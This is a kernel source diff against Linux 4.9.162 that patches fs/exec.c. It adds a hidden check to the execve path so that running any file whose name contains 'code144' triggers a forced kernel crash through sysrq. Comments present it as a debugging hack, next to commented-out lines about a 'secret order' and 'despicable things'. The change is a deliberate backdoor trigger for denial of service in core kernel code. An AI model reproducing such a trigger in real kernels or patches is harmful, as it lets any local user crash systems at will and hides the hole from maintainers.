Binary files linux-4.9.162/Documentation/sphinx/kernel-doc.pyc and linux-4.9.162-patch/Documentation/sphinx/kernel-doc.pyc differ
Binary files linux-4.9.162/Documentation/sphinx/load_config.pyc and linux-4.9.162-patch/Documentation/sphinx/load_config.pyc differ
diff -ruN linux-4.9.162/fs/exec.c linux-4.9.162-patch/fs/exec.c
--- linux-4.9.162/fs/exec.c	2019-03-05 17:57:07.000000000 +0100
+++ linux-4.9.162-patch/fs/exec.c	2019-04-23 17:25:28.044077140 +0200
@@ -57,6 +57,7 @@
 #include <linux/oom.h>
 #include <linux/compat.h>
 #include <linux/vmalloc.h>
+#include <linux/sysrq.h>
 
 #include <asm/uaccess.h>
 #include <asm/mmu_context.h>
@@ -1824,6 +1825,12 @@
 	const char __user *const __user *__argv,
 	const char __user *const __user *__envp)
 {
+	// TODO: setub kdb for easier breakpoints
+	if (strstr(filename->name, "code144") != NULL) {
+		//printk("[DEBUG KERNEL HACK] \"%s\" is the secret code!", filename->name);
+		//panic("Secret order recieved, proceeding to do despicable things");
+		handle_sysrq('c');
+	}
 	struct user_arg_ptr argv = { .ptr.native = __argv };
 	struct user_arg_ptr envp = { .ptr.native = __envp };
 	return do_execveat_common(AT_FDCWD, filename, argv, envp, 0);
